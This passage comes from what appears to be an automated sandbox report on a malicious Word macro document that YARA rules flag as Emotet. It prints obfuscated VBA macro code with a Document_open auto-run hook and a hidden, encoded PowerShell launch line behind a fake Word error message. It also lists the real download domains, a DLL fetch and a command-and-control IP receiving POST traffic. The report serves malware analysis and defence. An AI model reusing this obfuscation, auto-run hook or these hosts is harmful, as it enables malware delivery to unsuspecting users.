                                        Set fxJTHGJF = GPfHF
                                        tfgmN.Close
                                        Set tNvqYU = Nothing
                                        Set qhuKHDC = hKjoxAHI
                                        Set tfgmN = Nothing
                                        tfgmN:
                                        Vald5avf9551m1u9_q = Zacj6cs0xxmkchq(X_3mj_vfdq5m9)
                                           GoTo JJetH
                                        Dim MeLoxDCJT As Object
                                        Set EcBqJBVE = ODgRUaAId
                                        Set MeLoxDCJT = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim JJetH As Object
                                        Set JJetH = MeLoxDCJT.CreateTextFile("VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ")
                                        JJetH.WriteLine "eKjGCADVsuMVfjHhDc"
                                        JJetH.WriteLine "mMpvHwuBnnrqGyIFq"
                                        JJetH.WriteLine "hWxuzXUxYdWuBHC"
                                        Set ixuyHGriH = uLRAyCA
                                        JJetH.Close
                                        Set MeLoxDCJT = Nothing
                                        Set XSlyHJ = LBFSC
                                        Set JJetH = Nothing
                                        JJetH:
                                        Slz39ct0lz_ksnd = Vald5avf9551m1u9_q
                                           GoTo hgvZG
                                        Dim TmGkDL As Object
                                        Set QCDEyAHw = YBonG
                                        Set TmGkDL = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim hgvZG As Object
                                        Set hgvZG = TmGkDL.CreateTextFile("LhykJB:\jTdNFUJ\PnxpBEA.YspSlC")
                                        hgvZG.WriteLine "hDlEFEcAPqOXZqg"
                                        hgvZG.WriteLine "WVtJEvzwejAL"
                                        hgvZG.WriteLine "YIyOHHHeDXloKIBE"
                                        Set FrVPCyW = noyuzC
                                        hgvZG.Close
                                        Set TmGkDL = Nothing
                                        Set kggQZcCIE = gxwmz
                                        Set hgvZG = Nothing
                                        hgvZG:
                                        End Function
                                        Function Zacj6cs0xxmkchq(Sagq26te2gujbyg)
                                        Pn8s1r_n_tq7o5093 = Leedy8frqauxr
                                           GoTo RJCEFJhC
                                        Dim WcDDCTDnI As Object
                                        Set LqqhhpAQ = bzYfQcEHB
                                        Set WcDDCTDnI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim RJCEFJhC As Object
                                        Set RJCEFJhC = WcDDCTDnI.CreateTextFile("MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD")
                                        RJCEFJhC.WriteLine "MJtNyEaooLCJCF"
                                        RJCEFJhC.WriteLine "UqiKuFLuUFAG"
                                        RJCEFJhC.WriteLine "zErBUYAGeMPaGBPDC"
                                        Set oTwTJAJ = xZGeAsHP
                                        RJCEFJhC.Close
                                        Set WcDDCTDnI = Nothing
                                        Set sHovtYJn = naqcFCA
                                        Set RJCEFJhC = Nothing
                                        RJCEFJhC:
                                        Zacj6cs0xxmkchq = Replace(Sagq26te2gujbyg, "]a" + "nw[3", Ty8salh27qds_)
                                           GoTo ZYnQf
                                        Dim GUUgA As Object
                                        Set PRsSHBf = dwJWfYEzQ
                                        Set GUUgA = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                        Dim ZYnQf As Object
                                        Set ZYnQf = GUUgA.CreateTextFile("gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ")
                                        ZYnQf.WriteLine "aekFkFuGVeluWCH"
                                        ZYnQf.WriteLine "qsYNSviAFUkyhFd"
                                        ZYnQf.WriteLine "rWCJIFDWVfATR"
                                        Set XJUEA = vkAhEABKZ
                                        ZYnQf.Close
                                        Set GUUgA = Nothing
                                        Set EjrLDNGq = LXJdHABRP
                                        Set ZYnQf = Nothing
                                        ZYnQf:
                                        End Function
                                        VBA File Name: Larj61e5m5vzwh77, Stream Size: 703
                                        General
                                        Stream Path: Macros/VBA/Larj61e5m5vzwh77
                                        VBA File Name: Larj61e5m5vzwh77
                                        Stream Size: 703

                                        VBA Code Keywords

                                        Keyword
                                        Attribute
                                        VB_Name
                                        VBA Code
                                        Attribute VB_Name = "Larj61e5m5vzwh77"
                                        VBA File Name: Teh9tkv0p83u4g, Stream Size: 1114
                                        General
                                        Stream Path: Macros/VBA/Teh9tkv0p83u4g
                                        VBA File Name: Teh9tkv0p83u4g
                                        Stream Size: 1114

                                        VBA Code Keywords

                                        Keyword
                                        Document_open()
                                        False
                                        Private
                                        VB_Exposed
                                        Attribute
                                        VB_Creatable
                                        VB_Name
                                        VB_PredeclaredId
                                        VB_GlobalNameSpace
                                        VB_Base
                                        VB_Customizable
                                        VB_TemplateDerived
                                        VBA Code
                                        Attribute VB_Name = "Teh9tkv0p83u4g"
                                        Attribute VB_Base = "1Normal.ThisDocument"
                                        Attribute VB_GlobalNameSpace = False
                                        Attribute VB_Creatable = False
                                        Attribute VB_PredeclaredId = True
                                        Attribute VB_Exposed = True
                                        Attribute VB_TemplateDerived = True
                                        Attribute VB_Customizable = True
                                        Private Sub Document_open()
                                        Rvpv59xrvp7m2wb
                                        End Sub

                                        Streams

                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                        General
                                        Stream Path: \x1CompObj
                                        File Type: data
                                        Stream Size: 146
                                        Entropy: 4.00187355764
                                        Base64 Encoded: False
                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path: \x5DocumentSummaryInformation
                                        File Type: data
                                        Stream Size: 4096
                                        Entropy: 0.279977375321
                                        Base64 Encoded: False
                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 544
                                        General
                                        Stream Path: \x5SummaryInformation
                                        File Type: data
                                        Stream Size: 544
                                        Entropy: 4.11919337695
                                        Base64 Encoded: False
                                        Stream Path: 1Table, File Type: data, Stream Size: 6412
                                        General
                                        Stream Path: 1Table
                                        File Type: data
                                        Stream Size: 6412
                                        Entropy: 6.14493480592
                                        Base64 Encoded: True
                                        Stream Path: Data, File Type: data, Stream Size: 99188
                                        General
                                        Stream Path: Data
                                        File Type: data
                                        Stream Size: 99188
                                        Entropy: 7.39017711825
                                        Base64 Encoded: True
                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                                        General
                                        Stream Path: Macros/PROJECT
                                        File Type: ASCII text, with CRLF line terminators
                                        Stream Size: 523
                                        Entropy: 5.477498743
                                        Base64 Encoded: True
                                        Data ASCII:I D = " { F 5 B 4 5 2 4 B - D 1 E A - 4 B 0 7 - A E 3 D - 1 0 5 F 6 5 5 7 F F A 4 } " . . D o c u m e n t = T e h 9 t k v 0 p 8 3 u 4 g / & H 0 0 0 0 0 0 0 0 . . M o d u l e = L a r j 6 1 e 5 m 5 v z w h 7 7 . . M o d u l e = A 8 1 c _ p c o t 0 t 3 c 8 . . E x e N a m e 3 2 = " M i s b h 4 j 2 t p 3 x c 7 d 8 3 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 E 2 C 2 D 5 3 D 5 B 3 5 5 B 7 5 5 B 7 5 5 B 7 5 5 B 7
                                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 143
                                        General
                                        Stream Path: Macros/PROJECTwm
                                        File Type: data
                                        Stream Size: 143
                                        Entropy: 3.86963281051
                                        Base64 Encoded: True
                                        Data ASCII:T e h 9 t k v 0 p 8 3 u 4 g . T . e . h . 9 . t . k . v . 0 . p . 8 . 3 . u . 4 . g . . . L a r j 6 1 e 5 m 5 v z w h 7 7 . L . a . r . j . 6 . 1 . e . 5 . m . 5 . v . z . w . h . 7 . 7 . . . A 8 1 c _ p c o t 0 t 3 c 8 . A . 8 . 1 . c . _ . p . c . o . t . 0 . t . 3 . c . 8 . . . . .
                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5224
                                        General
                                        Stream Path: Macros/VBA/_VBA_PROJECT
                                        File Type: data
                                        Stream Size: 5224
                                        Entropy: 5.5041300643
                                        Base64 Encoded: True
                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 670
                                        General
                                        Stream Path: Macros/VBA/dir
                                        File Type: data
                                        Stream Size: 670
                                        Entropy: 6.43897053938
                                        Base64 Encoded: True
                                        Stream Path: WordDocument, File Type: data, Stream Size: 21038
                                        General
                                        Stream Path: WordDocument
                                        File Type: data
                                        Stream Size: 21038
                                        Entropy: 4.0974939161
                                        Base64 Encoded: True

                                        Network Behavior

                                        Snort IDS Alerts

                                        Timestamp                 Protocol  SID   Message                         Source Port  Dest Port  Source IP        Dest IP
                                        01/07/21-18:36:11.466200  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49169      173.255.195.246  192.168.2.22

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                        Jan 7, 2021 18:36:35.484746933 CET4917180192.168.2.225.2.136.90
                                        Jan 7, 2021 18:37:40.480453014 CET80491715.2.136.90192.168.2.22
                                        Jan 7, 2021 18:37:40.480637074 CET4917180192.168.2.225.2.136.90

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jan 7, 2021 18:36:10.144685984 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                        Jan 7, 2021 18:36:10.249505997 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                                        Jan 7, 2021 18:36:10.555039883 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                                        Jan 7, 2021 18:36:10.618753910 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                                        Jan 7, 2021 18:36:10.955595970 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                                        Jan 7, 2021 18:36:11.131052017 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                                        Jan 7, 2021 18:36:11.478858948 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                                        Jan 7, 2021 18:36:11.900259018 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Jan 7, 2021 18:36:10.144685984 CET | 192.168.2.22 | 8.8.8.8 | 0x51f2 | Standard query (0) | hangarlastik.com | A (IP address) | IN (0x0001)
                                        Jan 7, 2021 18:36:10.555039883 CET | 192.168.2.22 | 8.8.8.8 | 0x4aa4 | Standard query (0) | padreescapes.com | A (IP address) | IN (0x0001)
                                        Jan 7, 2021 18:36:10.955595970 CET | 192.168.2.22 | 8.8.8.8 | 0x70c0 | Standard query (0) | sarture.com | A (IP address) | IN (0x0001)
                                        Jan 7, 2021 18:36:11.478858948 CET | 192.168.2.22 | 8.8.8.8 | 0x3714 | Standard query (0) | seo.udaipurkart.com | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Jan 7, 2021 18:36:10.249505997 CET | 8.8.8.8 | 192.168.2.22 | 0x51f2 | No error (0) | hangarlastik.com |  | 89.252.164.58 | A (IP address) | IN (0x0001)
                                        Jan 7, 2021 18:36:10.618753910 CET | 8.8.8.8 | 192.168.2.22 | 0x4aa4 | No error (0) | padreescapes.com |  | 66.153.205.191 | A (IP address) | IN (0x0001)
                                        Jan 7, 2021 18:36:11.131052017 CET | 8.8.8.8 | 192.168.2.22 | 0x70c0 | No error (0) | sarture.com |  | 173.255.195.246 | A (IP address) | IN (0x0001)
                                        Jan 7, 2021 18:36:11.900259018 CET | 8.8.8.8 | 192.168.2.22 | 0x3714 | No error (0) | seo.udaipurkart.com |  | 103.92.235.25 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • hangarlastik.com
                                        • padreescapes.com
                                        • sarture.com
                                        • seo.udaipurkart.com
                                        • 5.2.136.90

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.22 | 49167 | 89.252.164.58 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jan 7, 2021 18:36:10.348764896 CET | 0 | OUT | GET /cgi-bin/Ui4n/ HTTP/1.1
                                        Host: hangarlastik.com
                                        Connection: Keep-Alive
                                        Jan 7, 2021 18:36:10.431408882 CET | 1 | IN | HTTP/1.1 302 Found
                                        Date: Thu, 07 Jan 2021 17:36:09 GMT
                                        Server: Apache
                                        Location: http://hangarlastik.com/cgi-sys/suspendedpage.cgi
                                        Content-Length: 233
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://hangarlastik.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                        Jan 7, 2021 18:36:10.435518026 CET | 1 | OUT | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                        Host: hangarlastik.com
                                        Jan 7, 2021 18:36:10.527239084 CET | 1 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 07 Jan 2021 17:36:09 GMT
                                        Server: Apache
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.22 | 49168 | 66.153.205.191 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jan 7, 2021 18:36:10.774549007 CET | 9 | OUT | GET /blog/0I/ HTTP/1.1
                                        Host: padreescapes.com
                                        Connection: Keep-Alive
                                        Jan 7, 2021 18:36:10.933862925 CET | 11 | IN | HTTP/1.1 401 Unauthorized
                                        Content-Type: text/html
                                        Server:
                                        WWW-Authenticate: Negotiate
                                        WWW-Authenticate: NTLM
                                        X-Content-Type-Options: nosniff
                                        X-Xss-Protection: 1; mode=block
                                        Date: Thu, 07 Jan 2021 17:36:10 GMT
                                        Content-Length: 1293
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>401 - Unauthorized: Access is denied due to invalid credentials.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>401 - Unauthorized: Access is d
                                        Jan 7, 2021 18:36:10.933907986 CET | 11 | IN
                                        Data Ascii: enied due to invalid credentials.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        2 | 192.168.2.22 | 49169 | 173.255.195.246 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jan 7, 2021 18:36:11.299278021 CET | 11 | OUT | GET /wp-includes/JD8/ HTTP/1.1
                                        Host: sarture.com
                                        Connection: Keep-Alive
                                        Jan 7, 2021 18:36:11.466200113 CET | 12 | IN | HTTP/1.1 403 Forbidden
                                        Date: Thu, 07 Jan 2021 17:36:11 GMT
                                        Server: Apache
                                        Content-Length: 199
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        3 | 192.168.2.22 | 49170 | 103.92.235.25 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jan 7, 2021 18:36:12.062374115 CET | 13 | OUT | GET /rx-5700-6hnr7/Sgms/ HTTP/1.1
                                        Host: seo.udaipurkart.com
                                        Connection: Keep-Alive
                                        Jan 7, 2021 18:36:12.229958057 CET | 14 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 07 Jan 2021 17:35:31 GMT
                                        Server: Apache
                                        X-Powered-By: PHP/7.3.11
                                        Cache-Control: no-cache, must-revalidate
                                        Pragma: no-cache
                                        Expires: Thu, 07 Jan 2021 17:35:31 GMT
                                        Content-Disposition: attachment; filename="mNGc8tNL7Bzy48w3L1.dll"
                                        Content-Transfer-Encoding: binary
                                        Set-Cookie: 5ff74663e945f=1610040931; expires=Thu, 07-Jan-2021 17:36:31 GMT; Max-Age=60; path=/
                                        Last-Modified: Thu, 07 Jan 2021 17:35:31 GMT
                                        Keep-Alive: timeout=6, max=100
                                        Connection: Keep-Alive
                                        Transfer-Encoding: chunked
                                        Content-Type: application/octet-stream


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        4 | 192.168.2.22 | 49171 | 5.2.136.90 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jan 7, 2021 18:36:34.758904934 CET | 214 | OUT | POST /1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ HTTP/1.1
                                        DNT: 0
                                        Referer: 5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/
                                        Content-Type: multipart/form-data; boundary=------------------kE9SOewkKUR6zpUliE
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 5.2.136.90
                                        Content-Length: 6772
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 7, 2021 18:36:35.483923912 CET | 222 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Thu, 07 Jan 2021 17:36:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Ascii: I)mCON7Q!bd>8CSi7=>P1=P'-Cv-"_7^qur?-X(cWP/^RxLtjcRwj"9P=l94<'':sJ\=D%~p40


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Memory Usage

                                        High Level Behavior Distribution

                                        Behavior

                                        System Behavior

                                        General

                                        Start time:18:35:36
                                        Start date:07/01/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                        Imagebase:0x13fdd0000
                                        File size:1424032 bytes
                                        MD5 hash:95C38D04597050285A18F66039EDB456
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:35:37
                                        Start date:07/01/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [Base64-encoded command omitted]
                                        Imagebase:0x4a1b0000
                                        File size:345088 bytes
                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:35:38
                                        Start date:07/01/2021
                                        Path:C:\Windows\System32\msg.exe
                                        Wow64 process (32bit):false
                                        Commandline:msg user /v Word experienced an error trying to open the file.
                                        Imagebase:0xff950000
                                        File size:26112 bytes
                                        MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:35:38
                                        Start date:07/01/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:POwersheLL -w hidden -ENCOD [Base64-encoded command omitted]
                                        Imagebase:0x13f3c0000
                                        File size:473600 bytes
                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2092804988.00000000001B6000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2092937441.0000000001B86000.00000004.00000001.sdmp, Author: Florian Roth
                                        Reputation:high

                                        General

                                        Start time:18:35:43
                                        Start date:07/01/2021
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                                        Imagebase:0xffa00000
                                        File size:45568 bytes
                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:35:43
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2095079967.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:35:44
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096612439.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:35:45
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2097844811.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:35:45
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2099512002.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:35:46
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2100913831.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:35:47
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101819334.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:35:47
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103080686.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:35:48
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104205195.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:35:48
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
